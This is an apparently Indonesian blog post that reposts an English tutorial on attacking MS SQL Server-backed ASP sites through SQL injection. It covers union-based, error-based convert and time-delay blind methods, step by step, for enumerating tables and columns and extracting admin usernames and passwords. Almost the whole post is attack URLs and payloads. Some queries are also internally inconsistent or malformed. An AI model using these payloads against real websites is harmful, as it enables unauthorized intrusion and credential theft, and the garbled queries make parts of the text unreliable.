Toot – MySQL Injection


sql_injection
Berikut Tutorial MySQL Injection yang bisa sobat pelajari, tutorial ini saya dapatkan dari author dibawah.
[~] MsSQL – Union Attack. [~]

So lets say our target is: http://www.crysan.edu/manager.asp?id=14

We can find the column count by order by clause.
This works just like the MySQL Union Based method.

http://www.crysan.edu/manager.asp?id=14 ORDER BY 1–

We get something like:
Quote:
ADODB.Recordset Error ‘800a0bcd ‘

Either BOF or EOF is True, or the current record has been deleted requested operation requires a current record.

/ manager.asp, line 10

Let’s encrease 1 to 2, 2 to 3 etc…

http://www.crysan.edu/manager.asp?id=14 ORDER BY 2–
http://www.crysan.edu/manager.asp?id=14 ORDER BY 3–
http://www.crysan.edu/manager.asp?id=14 ORDER BY 4–

http://www.crysan.edu/manager.asp?id=14 ORDER BY 13–

…until we get an error like that:
Quote:
Microsoft OLE DB Provider for ODBC Drivers Error ‘80040e14 ‘

[Microsoft] [ODBC SQL Server Driver] [SQL Server] The number of ORDER BY position 13 is outside the range of elements in the select list.

/ manager.asp, line 9

This means our column count is: 12.

If this is not working use string:
http://www.crysan.edu/manager.asp?id=-14’ and 1=2 ORDER BY 13–

This should work🙂, if not you can try the other 2 methods.

Now we select every column to see with which one we can readout the details we want.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12–

As we can see 2 , 12, 10 etc. can be used for our attack.
I will use 12.

Let’s see if we can get the name from the current database.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,db_name()–

Now we can see the current database name where the number 12 was.
Lets say the database name of our example is: crysan_db

Lets read the tables from crysan_db.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables–

Now we will get the first table of the database.

Lets say its: tutorial_pictures.
Thats not the table we want to see.

So let’s see whats the name of the next table.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables where table_name not in (‘tutorial_pictures’)–

Now we will see the next table: tutorial_category.
Mhm, still not the table we would like to see.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,table_name from information_schema.tables where table_name not in (‘tutorial_pictures’,’tutorial_category’)–[/color]

Do this until you found the table you wanted.
If its blank, you reached the end.

Finally we got this: tutorial_admin_users.
Fine, lets go to the next step.

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name=’tutorial_admin_users’–

We will see the first column in the table.
Lets say its: id

So what to do as next ? Right !
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name=’tutorial_admin_users’ and column_name not in (‘id’)–

Now we can see the next column is: t_usr

Let’s redo the last step to get the next column.
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,column_name from information_schema.columns where table_name=’tutorial_admin_users’ and column_name not in (‘t_usr’)–

Result: t_pwd

Finally we got this.

Database: crysan_db
Table: tutorial_admin_users
Columns: id, t_usr, t_pwd

Lets get the admin details =)

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users–

Result: admin

http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users–

Result: 5683

If we want to get the details from the next user:
http://www.crysan.edu/manager.asp?id=14 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,t_usr from tutorial_admin_users where t_usr not in (‘admin’)–

[~] MsSQL – Convert Attack. [~]

This is my favorite way :3
Our target for this is as example: http://sub.crysan.gov/news.asp?game=1

Okay, lets get the database.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,db_name)–

We should get an error message like that:
Quote:
Microsoft OLE DB Provider for ODBC Drivers Error ‘80040e07 ‘

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value ‘intranet’ to a column of data type int.

news.asp, line 9

Okay, we know now that the database name is: intranet
Lets get the tables.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_sche?ma.tables))–

Now the same game like on the union attack.
We got trough that syntax the first table from the database.
Its: apfel_ficker

Time for the next table.
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_sche?ma.tables+where+table_name+not+in+(‘apfel_ficker’)))–

The next table is: sperma_schleuder

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+table_name+from+information_sche?ma.tables+where+table_name+not+in+(‘apfel_ficker’,’sperma_schleuder’)))–

We do this until we get what we want.
Lets say we found: lappen_user

Ofcourse we need now to get the columns.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_sch?ema.columns+where+table_name=’lappen_user’))–

Its the same thing here like above.
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_sch?ema.columns+where+table_name=’lappen_user+and+column_name+not+in+(‘id’)))–
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+column_name+from+information_sch?ema.columns+where+table_name=’lappen_user+and+column_name+not+in+(‘id’,’username?’)))–

Columns; ID, username, passwd

Now we only need to read the data out.
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+username+from+lappen_user))–
Now we see that the username is admin.
Lets get the password.

http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+passwd+from+lappen_user))–
Now we got the password.

If we want to get the details from the next user:
http://sub.crysan.gov/news.asp?game=1+and+1=convert(int,(select+top+1+username+from+lappen_user+where+?username+not+in+(‘admin’)))–

[~] MsSQL – Blind (Time Delay). [~]

Okay this will be the last way I show you.
Why not normal blind ? Because this seems to work better.

Target: http://crysan.cat/wrd/nyan.asp?cat=155

If we do this:
http://crysan.cat/wrd/nyan.asp?cat=155; WAITFOR DELAY ’00:00:05′–

The database takes 5 seconds to response.
Time to get the database🙂

http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=1) WAITFOR DELAY ’00:00:05′–
Directly we get an error.

1 stands for the char count, means if the database name is intra.
It haves 5 chars, so our syntax would look like:
http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=5) WAITFOR DELAY ’00:00:05′–

Just put the char higher until the site takes 5 seconds to response/load.
As example; If we try
http://crysan.cat/wrd/nyan.asp?cat=155; IF (len(db_name)=24) WAITFOR DELAY ’00:00:05′–

And the page loads 5 seconds, the database name is 24 chars long.
This is important to understand for the next steps.

It’s time to get the name of the db.
We know that our db name is 5 chars long.

We are going to use ascii.
Here is an ascii to char list: http://pastebin.com/BfzH9EXt
You will need it for our next step.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>97) WAITFOR DELAY ’00:00:05′– – Loads directly.
(97 is the place where to enter the ascii, just change it to the ascii you want to test.)

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>98) WAITFOR DELAY ’00:00:05′– – Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),1,1)))>99) WAITFOR DELAY ’00:00:05′– – Takes 5 seconds to load.

Now we know the first char from the database name is: c

Now we need to get the 2’nd char.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>111) WAITFOR DELAY ’00:00:05′– – Loads directly.
(As you cann see I changed the 1 to 2, means we want know to know the 2’nd char. Change to 3 for 3’nd char and and and…)

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>112) WAITFOR DELAY ’00:00:05′– – Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((db_name()),2,1)))>113) WAITFOR DELAY ’00:00:05′– – Takes 5 seconds to load.

We know now the 2’nd char is: q

Keep doing that until you have all 5 chars.
Lets just say the database is: intra.

Time to get the tables

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),1,1)))=97) WAITFOR DELAY ’00:00:05′– – Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),1,1)))=97) WAITFOR DELAY ’00:00:05′– – Takes 5 seconds to load.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=120) WAITFOR DELAY ’00:00:05′– – Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=121) WAITFOR DELAY ’00:00:05′– – Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 NAME FROM sysobjects WHERE xtype=char(85)),2,1)))=122) WAITFOR DELAY ’00:00:05′– – Takes 5 seconds to load.

The second char is: z
Do you got the point ? Yea ? Fine

Lets say the table is: admin

Now its time to ? Right !, drink a coffe and get the columns.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 column_name FROM CEE.information_schema.columns WHERE table_name=’admin’),1,1)))=99) WAITFOR DELAY ’00:00:05′– – Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(lower(substring((SELECT TOP 1 column_name FROM CEE.information_schema.columns WHERE table_name=’admin’),1,1)))=100) WAITFOR DELAY ’00:00:05′– – Takes 5 seconds to load.

I guess you know the rest😉.
Now the final part…

The Column we got from the step above is: usr_name

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),1,1))=97) WAITFOR DELAY ’00:00:05′– – Takes 5 seconds to load

First char is: a

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),2,1))=98) WAITFOR DELAY ’00:00:05′– – Loads directly.

http://crysan.cat/wrd/nyan.asp?cat=155; IF (ascii(substring((SELECT TOP 1 usr_name FROM admin),2,1))=99) WAITFOR DELAY ’00:00:05′– – Takes 5 seconds to load.

I think I don’t need to continue here, I guess you understand it now.

Author: Ilyas robert

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s